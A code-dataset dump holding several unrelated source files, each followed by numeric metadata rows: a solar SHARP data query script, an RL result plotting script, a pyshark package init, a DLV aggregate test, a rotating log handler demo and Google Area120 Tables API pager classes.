k = h.query('hmi.sharp_720s[][2011.10.15_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.10.22_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.10.29_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.11.05_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.11.12_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.11.19_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.11.26_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.12.03_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.12.10_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.12.17_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.12.24_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.12.31_TAI/1d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
f_dataframe.to_csv('create_2011_features.csv')
return()
| 87.781421
| 252
| 0.728523
| 2,400
| 16,064
| 4.719167
| 0.048333
| 0.09359
| 0.057213
| 0.046795
| 0.969186
| 0.969186
| 0.969186
| 0.969186
| 0.966979
| 0.964683
| 0
| 0.05344
| 0.112363
| 16,064
| 182
| 253
| 88.263736
| 0.740865
| 0.027764
| 0
| 0.464286
| 0
| 0.473214
| 0.775806
| 0.120395
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008929
| false
| 0
| 0.017857
| 0
| 0.026786
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b22a8b48e7ad86f3238fd2c1c85183d6a42e903f
| 3,892
|
py
|
Python
|
read_log.py
|
NagisaZj/ac-teach
|
481811d5c80d0dbee54f16c063b4ea3262b82050
|
[
"MIT"
] | null | null | null |
read_log.py
|
NagisaZj/ac-teach
|
481811d5c80d0dbee54f16c063b4ea3262b82050
|
[
"MIT"
] | null | null | null |
read_log.py
|
NagisaZj/ac-teach
|
481811d5c80d0dbee54f16c063b4ea3262b82050
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import csv
import pandas
def smooth(data, smooth_range):
# print('hhhhhhh', type(data), len(data))
new_data = np.zeros_like(data)
for i in range(0, data.shape[-1]):
if i < smooth_range:
new_data[:, i] = 1. * np.sum(data[:, :i + 1], axis=1) / (i + 1)
else:
new_data[:, i] = 1. * np.sum(data[:, i - smooth_range + 1:i + 1], axis=1) / smooth_range
return new_data
def read_csv(paths=[]):
datas =[]
for p in paths:
with open(p,'r') as f:
data=pandas.read_csv(f)
print(data.keys())
w=[]
w.append(smooth(data['r'][None,:],100)[0])
w.append(data['l'])
w.append(data['t'])
w.append(smooth(data['success'][None,:],100)[0])
datas.append(w)
return datas
# d1 = read_csv(['/data2/zj/ac-teach/logs/OneGoalPickPlaceDenseEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_0/gym_eval.monitor.csv'])
#d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_2/gym_eval.monitor.csv'])
# d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_6/monitor2.csv'])
# d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_7/monitor2.csv'])
#
# d1 = read_csv(['/data2/zj/ac-teach/logs/OneGoalPickPlaceDenseEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_0/gym_eval.monitor.csv'])
# d2 = read_csv(['/data2/zj/ac-teach/logs/OneGoalPickPlaceDenseEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_0/monitor.csv'])
d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_10/monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_10/monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_15/gym_eval.monitor2.csv'])
d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_18/gym_eval.monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_18/monitor2.csv'])
d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_20/gym_eval.monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_20/monitor2.csv'])
d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_22/gym_eval.monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_22/monitor2.csv'])
d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_20/gym_eval.monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_22/gym_eval.monitor2.csv'])
#
d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_24/gym_eval.monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_24/monitor2.csv'])
#
d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_31/gym_eval.monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_31/monitor2.csv'])
plt.figure()
# plt.plot(range(len(d1[0][0])),d1[0][0])
# plt.plot(range(len(d2[0][0])),d2[0][0],color='r')
plt.plot(np.arange(d1[0][0].shape[0])*500,d1[0][0],label='Push, Push Source, Test')
plt.plot(np.arange(d2[0][0].shape[0])*500,d2[0][0],color='r',label='Push, Push Source, Train')
plt.legend()
plt.show()
| 55.6
| 144
| 0.752312
| 616
| 3,892
| 4.512987
| 0.144481
| 0.057914
| 0.090647
| 0.105755
| 0.792806
| 0.777698
| 0.777698
| 0.777698
| 0.764029
| 0.763309
| 0
| 0.046395
| 0.080678
| 3,892
| 69
| 145
| 56.405797
| 0.730576
| 0.237667
| 0
| 0.044444
| 0
| 0.333333
| 0.572444
| 0.552471
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.088889
| 0
| 0.177778
| 0.022222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b23343e83e6046a2c1f8a3f7cc9bc81900134114
| 220
|
py
|
Python
|
browser/Python site-packages/pyshark/__init__.py
|
lightnarcissus/TextWeb
|
7a67aede097a8e3a328edd539672cb0c777d1fde
|
[
"Apache-2.0"
] | null | null | null |
browser/Python site-packages/pyshark/__init__.py
|
lightnarcissus/TextWeb
|
7a67aede097a8e3a328edd539672cb0c777d1fde
|
[
"Apache-2.0"
] | null | null | null |
browser/Python site-packages/pyshark/__init__.py
|
lightnarcissus/TextWeb
|
7a67aede097a8e3a328edd539672cb0c777d1fde
|
[
"Apache-2.0"
] | 1
|
2019-02-15T08:18:41.000Z
|
2019-02-15T08:18:41.000Z
|
from pyshark.capture.live_capture import LiveCapture
from pyshark.capture.file_capture import FileCapture
from pyshark.capture.remote_capture import RemoteCapture
from pyshark.capture.inmem_capture import InMemCapture
| 55
| 57
| 0.881818
| 28
| 220
| 6.785714
| 0.428571
| 0.231579
| 0.378947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081818
| 220
| 4
| 58
| 55
| 0.940594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b2760ec851740beb70f30248119233b3691d0adb
| 161
|
py
|
Python
|
tests/parser/aggregates.count.boundguards.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.boundguards.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.boundguards.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a(0).
b(1).
b(2).
b(3).
okay(X) :- a(X), X < #count{V : b(V)}.
"""
output = """
a(0).
b(1).
b(2).
b(3).
okay(X) :- a(X), X < #count{V : b(V)}.
"""
| 9.470588
| 38
| 0.36646
| 36
| 161
| 1.638889
| 0.333333
| 0.067797
| 0.101695
| 0.135593
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0
| 0.062992
| 0.21118
| 161
| 16
| 39
| 10.0625
| 0.401575
| 0
| 0
| 0.857143
| 0
| 0
| 0.807453
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a23d5910eab0f106406fe6814df7e124ecb7870e
| 1,968
|
py
|
Python
|
05_rotating_test.py
|
AlanCLo/python_logging_ref
|
8f032cfaa747a4907be92ca84b53ed47400d913c
|
[
"MIT"
] | null | null | null |
05_rotating_test.py
|
AlanCLo/python_logging_ref
|
8f032cfaa747a4907be92ca84b53ed47400d913c
|
[
"MIT"
] | null | null | null |
05_rotating_test.py
|
AlanCLo/python_logging_ref
|
8f032cfaa747a4907be92ca84b53ed47400d913c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import sys
import logging
from logging.handlers import RotatingFileHandler
log = logging.getLogger('test')
log.setLevel(logging.DEBUG) # Max output
# Ref: https://docs.python.org/2/library/logging.handlers.html#rotatingfilehandler
rotating_handler = RotatingFileHandler('rotating.log', maxBytes=300, backupCount=3)
rotating_handler.setFormatter(logging.Formatter('%(filename)s: %(message)s'))
log.addHandler(rotating_handler)
# Output 200 bytes
log.info("1234567890123456789012345678") # This line is 50 bytes
log.info("1234567890123456789012345678") # This line is 50 bytes
log.info("1234567890123456789012345678") # This line is 50 bytes
log.info("1234567890123456789012345678") # This line is 50 bytes
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 200B 28 Mar 20:59 rotating.log
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 150B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 100B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.2
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 50B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.2
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.3
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.2
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.3
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 200B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.2
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.3
#
| 35.781818
| 83
| 0.668191
| 349
| 1,968
| 3.724928
| 0.17192
| 0.211538
| 0.055385
| 0.069231
| 0.708462
| 0.708462
| 0.708462
| 0.708462
| 0.708462
| 0.708462
| 0
| 0.202694
| 0.170224
| 1,968
| 54
| 84
| 36.444444
| 0.593386
| 0.707317
| 0
| 0.333333
| 0
| 0
| 0.283333
| 0.207407
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a25680d07d4ad54482a0d27eab64404eaab1acb9
| 15,445
|
py
|
Python
|
google/area120/tables/v1alpha1/area120-tables-v1alpha1-py/google/area120/tables_v1alpha1/services/tables_service/pagers.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 7
|
2021-02-21T10:39:41.000Z
|
2021-12-07T07:31:28.000Z
|
google/area120/tables/v1alpha1/area120-tables-v1alpha1-py/google/area120/tables_v1alpha1/services/tables_service/pagers.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 6
|
2021-02-02T23:46:11.000Z
|
2021-11-15T01:46:02.000Z
|
google/area120/tables/v1alpha1/area120-tables-v1alpha1-py/google/area120/tables_v1alpha1/services/tables_service/pagers.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 4
|
2021-01-28T23:25:45.000Z
|
2021-08-30T01:55:16.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterator, Awaitable, Callable, Sequence, Tuple, Optional, Iterator
from google.area120.tables_v1alpha1.types import tables
class ListTablesPager:
"""A pager for iterating through ``list_tables`` requests.
This class thinly wraps an initial
:class:`google.area120.tables_v1alpha1.types.ListTablesResponse` object, and
provides an ``__iter__`` method to iterate through its
``tables`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListTables`` requests and continue to iterate
through the ``tables`` field on the
corresponding responses.
All the usual :class:`google.area120.tables_v1alpha1.types.ListTablesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., tables.ListTablesResponse],
request: tables.ListTablesRequest,
response: tables.ListTablesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.area120.tables_v1alpha1.types.ListTablesRequest):
The initial request object.
response (google.area120.tables_v1alpha1.types.ListTablesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = tables.ListTablesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterator[tables.ListTablesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterator[tables.Table]:
for page in self.pages:
yield from page.tables
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListTablesAsyncPager:
"""A pager for iterating through ``list_tables`` requests.
This class thinly wraps an initial
:class:`google.area120.tables_v1alpha1.types.ListTablesResponse` object, and
provides an ``__aiter__`` method to iterate through its
``tables`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListTables`` requests and continue to iterate
through the ``tables`` field on the
corresponding responses.
All the usual :class:`google.area120.tables_v1alpha1.types.ListTablesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[tables.ListTablesResponse]],
request: tables.ListTablesRequest,
response: tables.ListTablesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.area120.tables_v1alpha1.types.ListTablesRequest):
The initial request object.
response (google.area120.tables_v1alpha1.types.ListTablesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = tables.ListTablesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterator[tables.ListTablesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterator[tables.Table]:
async def async_generator():
async for page in self.pages:
for response in page.tables:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListWorkspacesPager:
"""A pager for iterating through ``list_workspaces`` requests.
This class thinly wraps an initial
:class:`google.area120.tables_v1alpha1.types.ListWorkspacesResponse` object, and
provides an ``__iter__`` method to iterate through its
``workspaces`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListWorkspaces`` requests and continue to iterate
through the ``workspaces`` field on the
corresponding responses.
All the usual :class:`google.area120.tables_v1alpha1.types.ListWorkspacesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., tables.ListWorkspacesResponse],
request: tables.ListWorkspacesRequest,
response: tables.ListWorkspacesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.area120.tables_v1alpha1.types.ListWorkspacesRequest):
The initial request object.
response (google.area120.tables_v1alpha1.types.ListWorkspacesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = tables.ListWorkspacesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterator[tables.ListWorkspacesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterator[tables.Workspace]:
for page in self.pages:
yield from page.workspaces
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListWorkspacesAsyncPager:
"""A pager for iterating through ``list_workspaces`` requests.
This class thinly wraps an initial
:class:`google.area120.tables_v1alpha1.types.ListWorkspacesResponse` object, and
provides an ``__aiter__`` method to iterate through its
``workspaces`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListWorkspaces`` requests and continue to iterate
through the ``workspaces`` field on the
corresponding responses.
All the usual :class:`google.area120.tables_v1alpha1.types.ListWorkspacesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[tables.ListWorkspacesResponse]],
request: tables.ListWorkspacesRequest,
response: tables.ListWorkspacesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.area120.tables_v1alpha1.types.ListWorkspacesRequest):
The initial request object.
response (google.area120.tables_v1alpha1.types.ListWorkspacesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = tables.ListWorkspacesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterator[tables.ListWorkspacesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterator[tables.Workspace]:
async def async_generator():
async for page in self.pages:
for response in page.workspaces:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListRowsPager:
"""A pager for iterating through ``list_rows`` requests.
This class thinly wraps an initial
:class:`google.area120.tables_v1alpha1.types.ListRowsResponse` object, and
provides an ``__iter__`` method to iterate through its
``rows`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListRows`` requests and continue to iterate
through the ``rows`` field on the
corresponding responses.
All the usual :class:`google.area120.tables_v1alpha1.types.ListRowsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., tables.ListRowsResponse],
request: tables.ListRowsRequest,
response: tables.ListRowsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.area120.tables_v1alpha1.types.ListRowsRequest):
The initial request object.
response (google.area120.tables_v1alpha1.types.ListRowsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = tables.ListRowsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterator[tables.ListRowsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterator[tables.Row]:
for page in self.pages:
yield from page.rows
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListRowsAsyncPager:
"""A pager for iterating through ``list_rows`` requests.
This class thinly wraps an initial
:class:`google.area120.tables_v1alpha1.types.ListRowsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``rows`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListRows`` requests and continue to iterate
through the ``rows`` field on the
corresponding responses.
All the usual :class:`google.area120.tables_v1alpha1.types.ListRowsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[tables.ListRowsResponse]],
request: tables.ListRowsRequest,
response: tables.ListRowsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.area120.tables_v1alpha1.types.ListRowsRequest):
The initial request object.
response (google.area120.tables_v1alpha1.types.ListRowsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = tables.ListRowsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterator[tables.ListRowsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterator[tables.Row]:
async def async_generator():
async for page in self.pages:
for response in page.rows:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
| 40.116883
| 95
| 0.662933
| 1,702
| 15,445
| 5.810811
| 0.10517
| 0.058241
| 0.048028
| 0.068251
| 0.926188
| 0.922952
| 0.922952
| 0.922952
| 0.913549
| 0.913549
| 0
| 0.012634
| 0.251797
| 15,445
| 384
| 96
| 40.221354
| 0.843198
| 0.473098
| 0
| 0.801242
| 0
| 0
| 0.008238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.167702
| false
| 0
| 0.012422
| 0.074534
| 0.310559
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
